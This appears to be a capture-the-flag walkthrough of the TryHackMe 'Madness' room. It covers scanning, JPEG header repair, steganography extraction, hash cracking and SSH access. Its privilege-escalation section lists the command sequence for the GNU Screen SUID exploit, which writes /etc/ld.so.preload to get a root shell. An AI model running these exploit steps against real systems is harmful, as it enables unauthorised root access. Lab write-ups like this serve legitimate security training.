TryHackMe: Madness
Today we will take a look at TryHackMe: Madness. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.
Network scan
Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.152.45
Let’s check the site
As you can see, there is a picture icon above. Let’s click on it.
There are no picture. Let’s download and make some changes.
Command: wget http://10.10.152.45/thm.jpg
The .jpg file is corrupted. Let’s fix it.
Command: hexeditor thm.jpg
Now let’s try again.
We are provided with a hidden directory.
I was just checking and came across something like this.
There was another hint in the source code.
Open burpsuite and check one by one
And that’s it. We got different results
When we look at the site, we get such a result.
Maybe the image we download needed again. Because this is the steganography code.
Command: steghide info thm.jpg
Command: steghide — extract -sf thm.jpg
Let’s try to crack the hash we got
I tried to access the information we have with ssh, but it didn’t work. After a while, I remembered that it was in the form of supplements.
Let’s check.
We found the password, let’s enter.
Privilege Escalation
Command: find / -perm -u=s 2>/dev/null
We see something different. Let’s check the exploit.
I created the files in my terminal and transferred them to the target terminal
And I entered the commands.
Command: gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
Command: gcc -o /tmp/rootshell /tmp/rootshell.c
Command: echo “[+] Now we create our /etc/ld.so.preload file…”
Command: cd /etc
Command: umask 000
Command: screen -D -m -L ld.so.preload echo -ne “\x0a/tmp/libhax.so”
Command: echo “[+] Triggering…”
Command: screen -ls
Command: /tmp/rootshell
And now we are the root
“If you have any questions or comments, please do not hesitate to write. Have a good days”